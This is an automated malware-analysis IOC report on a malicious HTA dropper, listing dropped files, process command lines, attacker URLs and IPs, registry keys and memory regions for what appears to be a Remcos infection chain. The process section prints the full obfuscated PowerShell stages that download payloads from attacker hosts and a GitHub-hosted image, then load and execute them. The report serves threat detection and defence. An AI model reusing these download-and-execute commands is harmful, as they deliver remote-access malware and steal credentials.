IOC Report
na.hta

loading gif

Files

File Path
Type
Category
Malicious
na.hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
initial sample
malicious
C:\ProgramData\remcos\logs.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\seethebestpricewithgoodcookiesme[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\RESC057.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Mon Oct 14 11:23:41 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4woyycu2.4fs.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_euig21v5.xii.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eywarogv.yqa.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fr42fqsl.f13.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_meuczva5.5dy.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_se4co4er.yur.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tamrtuw1.sm5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ux0yfj5m.t3q.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vnysmfwq.kmh.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xu3cfo43.bvp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhv29F.tmp
Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\icthiyu
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\p44lx5ym\CSC1BDFD807A6FD4EDC87F258A79D1E57AA.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (352)
dropped
C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.out
Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
modified
There are 14 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\na.hta"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline"
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\icthiyu"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\swyajqfles"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\swyajqfles"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vzdkjbynsalyk"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC057.tmp" "c:\Users\user\AppData\Local\Temp\p44lx5ym\CSC1BDFD807A6FD4EDC87F258A79D1E57AA.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 5 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIF
192.3.220.40
malicious
https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg
185.199.111.133
malicious
http://192.3.220.40/450/RRFCCE.txt
192.3.220.40
malicious
idabo.duckdns.org
malicious
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
http://192.3.220.40/
unknown
http://geoplugin.net/json.gpur
unknown
http://www.imvu.comr
unknown
https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpgt
unknown
http://192.3.220.40
unknown
http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFs
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://192.3.24:
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFrosoft
unknown
https://contoso.com/License
unknown
http://geoplugin.net/json.gphy
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
http://www.nirsoft.net
unknown
http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFPG
unknown
http://go.micros
unknown
https://github.com/Pester/Pester
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://geoplugin.net/json.gp
178.237.33.50
https://www.google.com
unknown
http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFvu
unknown
http://crl.micro
unknown
https://raw.githubusercontent.com
unknown
http://geoplugin.net/json.gp/C
unknown
https://aka.ms/pscore6lB
unknown
http://192.3.220.40/450/seethebestpricewithgoodcookiesme.tIFGm
unknown
http://192.3.220.40/450/RRFCP
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://www.google.com/accounts/servicelogin
unknown
https://login.yahoo.com/config/login
unknown
http://www.nirsoft.net/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://192.3.220.40/450/seethebe
unknown
http://geoplugin.net/json.gpRr&
unknown
http://www.ebuddy.com
unknown
There are 36 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
raw.githubusercontent.com
185.199.111.133
malicious
idabo.duckdns.org
135.148.195.248
malicious
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
135.148.195.248
idabo.duckdns.org
United States
malicious
192.3.220.40
unknown
United States
malicious
185.199.111.133
raw.githubusercontent.com
Netherlands
malicious
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Rmc-I89M3S
exepath
HKEY_CURRENT_USER\SOFTWARE\Rmc-I89M3S
licence
HKEY_CURRENT_USER\SOFTWARE\Rmc-I89M3S
time
There are 11 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
571D000
trusted library allocation
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
13EC000
heap
page read and write
malicious
13B0000
heap
page read and write
malicious
2D4E000
stack
page read and write
malicious
5519000
trusted library allocation
page read and write
malicious
65D4000
heap
page read and write
190000
heap
page read and write
76F0000
heap
page read and write
25A0000
heap
page read and write
1488000
heap
page read and write
65D4000
heap
page read and write
4C61000
heap
page read and write
6113000
heap
page read and write
5040000
direct allocation
page read and write
65D0000
heap
page read and write
89F4000
heap
page read and write
7F62000
trusted library allocation
page read and write
9D70000
trusted library section
page read and write
A21E000
stack
page read and write
1020000
heap
page read and write
65F2000
heap
page read and write
53EE000
stack
page read and write
7A90000
trusted library allocation
page read and write
3485000
trusted library allocation
page execute and read and write
65C7000
heap
page read and write
C61000
heap
page read and write
5DB3000
heap
page read and write
65D2000
heap
page read and write
4775000
trusted library allocation
page read and write
25FE000
stack
page read and write
5C4B000
heap
page read and write
7060000
trusted library allocation
page read and write
65DC000
heap
page read and write
4EE0000
heap
page execute and read and write
3454000
trusted library allocation
page read and write
5042000
direct allocation
page read and write
50E0000
direct allocation
page read and write
2F8F000
stack
page read and write
2910000
trusted library allocation
page read and write
79D3000
heap
page read and write
7BB0000
trusted library allocation
page execute and read and write
41D8000
trusted library allocation
page read and write
2600000
heap
page read and write
3585000
heap
page read and write
2740000
heap
page read and write
65E0000
heap
page read and write
E9E000
stack
page read and write
5D28000
heap
page read and write
30CF000
stack
page read and write
653E000
heap
page read and write
7DB7000
heap
page read and write
4FF2000
heap
page read and write
65D4000
heap
page read and write
CE4000
heap
page read and write
75EA000
stack
page read and write
4FCB000
heap
page read and write
4EB0000
trusted library allocation
page read and write
5DB2000
heap
page read and write
65D9000
heap
page read and write
5D37000
heap
page read and write
4C5C000
heap
page read and write
2700000
trusted library allocation
page read and write
5053000
heap
page read and write
5C49000
heap
page read and write
4B87000
heap
page read and write
2748000
heap
page read and write
65D9000
heap
page read and write
7D60000
heap
page read and write
BC0000
heap
page read and write
330E000
stack
page read and write
565D000
trusted library allocation
page read and write
4C5C000
heap
page read and write
6575000
heap
page execute and read and write
4731000
trusted library allocation
page read and write
6081000
heap
page read and write
66BE000
stack
page read and write
51F7000
trusted library allocation
page read and write
33AE000
heap
page read and write
3460000
trusted library allocation
page read and write
7CBA000
trusted library allocation
page read and write
7A70000
trusted library allocation
page execute and read and write
5446000
trusted library allocation
page read and write
6113000
heap
page read and write
A30000
heap
page read and write
4F99000
heap
page read and write
27D9000
heap
page read and write
78DE000
stack
page read and write
7AE0000
heap
page read and write
651B000
heap
page read and write
60E3000
heap
page read and write
65B3000
heap
page read and write
74A5000
heap
page execute and read and write
2A10000
heap
page read and write
67C5000
heap
page execute and read and write
552F000
trusted library allocation
page read and write
5C4B000
heap
page read and write
76AE000
stack
page read and write
4E08000
trusted library allocation
page read and write
56E9000
trusted library allocation
page read and write
60C7000
heap
page read and write
BC6000
heap
page read and write
677E000
stack
page read and write
7D60000
trusted library allocation
page read and write
5DB2000
heap
page read and write
4F8C000
heap
page read and write
4160000
heap
page read and write
6552000
heap
page read and write
69C0000
heap
page read and write
5C4B000
heap
page read and write
7150000
trusted library allocation
page read and write
71B0000
trusted library allocation
page read and write
4F71000
heap
page read and write
6A3D000
stack
page read and write
478000
remote allocation
page execute and read and write
41B000
system
page execute and read and write
6621000
heap
page read and write
7CA0000
trusted library allocation
page read and write
6CE9000
heap
page read and write
3440000
trusted library allocation
page read and write
657F000
heap
page read and write
7A60000
heap
page read and write
6B2F000
stack
page read and write
5834000
trusted library allocation
page read and write
4CA2000
heap
page read and write
28F2000
heap
page read and write
BC7000
heap
page read and write
47F000
stack
page read and write
5D41000
heap
page read and write
BD7000
stack
page read and write
7C20000
heap
page read and write
CEE000
heap
page read and write
34B0000
heap
page read and write
A55000
heap
page read and write
75AE000
stack
page read and write
6E8A000
trusted library allocation
page read and write
4614000
heap
page read and write
33BB000
heap
page read and write
4610000
heap
page read and write
CFB000
heap
page read and write
4FE3000
heap
page read and write
4C48000
heap
page read and write
4616000
heap
page read and write
29B5000
heap
page read and write
4B74000
heap
page read and write
35D3000
heap
page read and write
4D36000
trusted library allocation
page read and write
28F8000
heap
page read and write
290D000
heap
page read and write
6586000
heap
page read and write
5C94000
heap
page read and write
6E70000
trusted library allocation
page read and write
4763000
trusted library allocation
page read and write
3485000
trusted library allocation
page execute and read and write
801E000
stack
page read and write
7D00000
trusted library allocation
page read and write
4280000
heap
page read and write
BEF000
stack
page read and write
4F92000
heap
page read and write
6542000
heap
page read and write
6586000
heap
page read and write
60D1000
heap
page read and write
2AD4000
heap
page read and write
4B89000
heap
page read and write
7FDE000
stack
page read and write
5DCC000
heap
page read and write
65BF000
heap
page read and write
293B000
heap
page read and write
6113000
heap
page read and write
29BD000
heap
page read and write
D05000
heap
page read and write
4102000
trusted library allocation
page read and write
81F0000
trusted library allocation
page read and write
4C70000
heap
page execute and read and write
282E000
stack
page read and write
65BF000
heap
page read and write
28C0000
heap
page read and write
7DB000
stack
page read and write
4CC1000
heap
page read and write
6594000
heap
page read and write
60CA000
heap
page read and write
5466000
trusted library allocation
page read and write
28C8000
heap
page read and write
4D16000
heap
page read and write
7DFF000
heap
page read and write
6586000
heap
page read and write
BF0000
heap
page read and write
25A5000
heap
page read and write
74A0000
heap
page execute and read and write
4B63000
heap
page read and write
7CEE000
stack
page read and write
673E000
stack
page read and write
5D16000
heap
page read and write
44B1000
trusted library allocation
page read and write
7BD0000
trusted library allocation
page read and write
220000
heap
page read and write
7CAF000
stack
page read and write
4050000
heap
page read and write
5D52000
heap
page read and write
10FA000
heap
page read and write
271E000
unkown
page read and write
4B69000
trusted library allocation
page read and write
4120000
trusted library allocation
page read and write
6CB000
stack
page read and write
6F0A000
heap
page read and write
2A90000
heap
page read and write
D09000
heap
page read and write
35D7000
heap
page read and write
7B8B000
heap
page read and write
65C7000
heap
page read and write
4105000
trusted library allocation
page execute and read and write
25FF000
stack
page read and write
5FA9000
trusted library allocation
page read and write
1F0000
heap
page read and write
6EE3000
heap
page read and write
60D1000
heap
page read and write
45C000
system
page execute and read and write
AA0000
heap
page read and write
C91000
heap
page read and write
3450000
trusted library allocation
page read and write
7862000
heap
page read and write
686E000
stack
page read and write
6228000
trusted library allocation
page read and write
33BD000
heap
page read and write
29B5000
heap
page read and write
3370000
heap
page read and write
5D36000
heap
page read and write
7960000
heap
page read and write
2705000
trusted library allocation
page execute and read and write
64FF000
heap
page read and write
D0B000
heap
page read and write
28FE000
heap
page read and write
7D50000
trusted library allocation
page read and write
742E000
stack
page read and write
35A5000
heap
page read and write
2568000
stack
page read and write
4740000
heap
page read and write
6586000
heap
page read and write
28B0000
heap
page read and write
4723000
trusted library allocation
page read and write
7180000
trusted library allocation
page read and write
2BB0000
heap
page read and write
60D1000
heap
page read and write
7C00000
trusted library allocation
page execute and read and write
4CC4000
heap
page read and write
656E000
stack
page read and write
3078000
stack
page read and write
65BF000
heap
page read and write
4CC3000
heap
page read and write
68EE000
stack
page read and write
345D000
trusted library allocation
page execute and read and write
D0C000
stack
page read and write
52F0000
trusted library allocation
page read and write
892F000
stack
page read and write
6594000
heap
page read and write
8A05000
heap
page read and write
4170000
heap
page readonly
101E000
stack
page read and write
7970000
heap
page read and write
D30000
heap
page read and write
4CFE000
stack
page read and write
476C000
trusted library allocation
page read and write
6FD0000
heap
page execute and read and write
27DE000
heap
page read and write
4FC6000
heap
page read and write
293B000
heap
page read and write
4D20000
trusted library allocation
page execute and read and write
CFC000
heap
page read and write
795E000
stack
page read and write
5DCC000
heap
page read and write
2F68000
stack
page read and write
7CF0000
trusted library allocation
page read and write
65D9000
heap
page read and write
6542000
heap
page read and write
65DD000
heap
page read and write
3453000
trusted library allocation
page execute and read and write
CEE000
heap
page read and write
178000
stack
page read and write
6113000
heap
page read and write
65BF000
heap
page read and write
2902000
heap
page read and write
65C7000
heap
page read and write
460E000
stack
page read and write
5814000
trusted library allocation
page read and write
31B0000
heap
page read and write
2937000
heap
page read and write
5B41000
heap
page read and write
4FC1000
heap
page read and write
697E000
stack
page read and write
65E0000
heap
page read and write
65D9000
heap
page read and write
65BE000
stack
page read and write
34AF000
stack
page read and write
747E000
stack
page read and write
7BF0000
trusted library allocation
page read and write
7120000
trusted library allocation
page read and write
4F6E000
stack
page read and write
50D5000
heap
page read and write
4C60000
heap
page readonly
8C5C000
trusted library allocation
page read and write
7BA0000
heap
page read and write
65B3000
heap
page read and write
68F0000
trusted library allocation
page read and write
51C1000
trusted library allocation
page read and write
461F000
heap
page read and write
3395000
heap
page read and write
6E9B000
heap
page read and write
47E3000
trusted library allocation
page read and write
4FB5000
heap
page read and write
6E30000
heap
page read and write
654C000
heap
page read and write
5C4C000
heap
page read and write
5DB1000
heap
page read and write
50A0000
direct allocation
page read and write
4E9B000
stack
page read and write
6113000
heap
page read and write
6BE0000
heap
page execute and read and write
69FB000
stack
page read and write
5C4B000
heap
page read and write
B8E000
stack
page read and write
5ED4000
trusted library allocation
page read and write
79CA000
heap
page read and write
4F9E000
stack
page read and write
D2D000
heap
page read and write
4FE5000
heap
page read and write
65FA000
heap
page read and write
293D000
heap
page read and write
30B0000
heap
page read and write
65D2000
heap
page read and write
10016000
direct allocation
page execute and read and write
6EA5000
heap
page read and write
476A000
trusted library allocation
page read and write
2BBA000
heap
page read and write
27F4000
heap
page read and write
7B40000
heap
page read and write
5D50000
heap
page read and write
CE7000
heap
page read and write
7110000
trusted library allocation
page read and write
1448000
heap
page read and write
7F80000
trusted library allocation
page execute and read and write
798E000
heap
page read and write
34FE000
stack
page read and write
4F97000
heap
page read and write
65E0000
heap
page read and write
353C000
heap
page read and write
6FD000
stack
page read and write
2A30000
heap
page read and write
60D1000
heap
page read and write
9771000
trusted library allocation
page read and write
5D4F000
heap
page read and write
4B32000
heap
page read and write
31B6000
heap
page read and write
67C0000
heap
page execute and read and write
4A3F000
trusted library allocation
page read and write
6920000
trusted library allocation
page read and write
3460000
trusted library allocation
page read and write
B79000
heap
page read and write
7C70000
trusted library allocation
page read and write
4CC3000
heap
page read and write
7BC0000
trusted library allocation
page read and write
4FAE000
heap
page read and write
50E9000
heap
page read and write
1170000
heap
page read and write
BCB000
heap
page read and write
4250000
heap
page read and write
7010000
trusted library allocation
page read and write
89DE000
stack
page read and write
6630000
heap
page read and write
A1C0000
trusted library allocation
page read and write
5DB5000
heap
page read and write
529B000
trusted library allocation
page read and write
70E0000
trusted library allocation
page read and write
4FF2000
heap
page read and write
CCC000
heap
page read and write
899E000
stack
page read and write
7170000
trusted library allocation
page read and write
2740000
heap
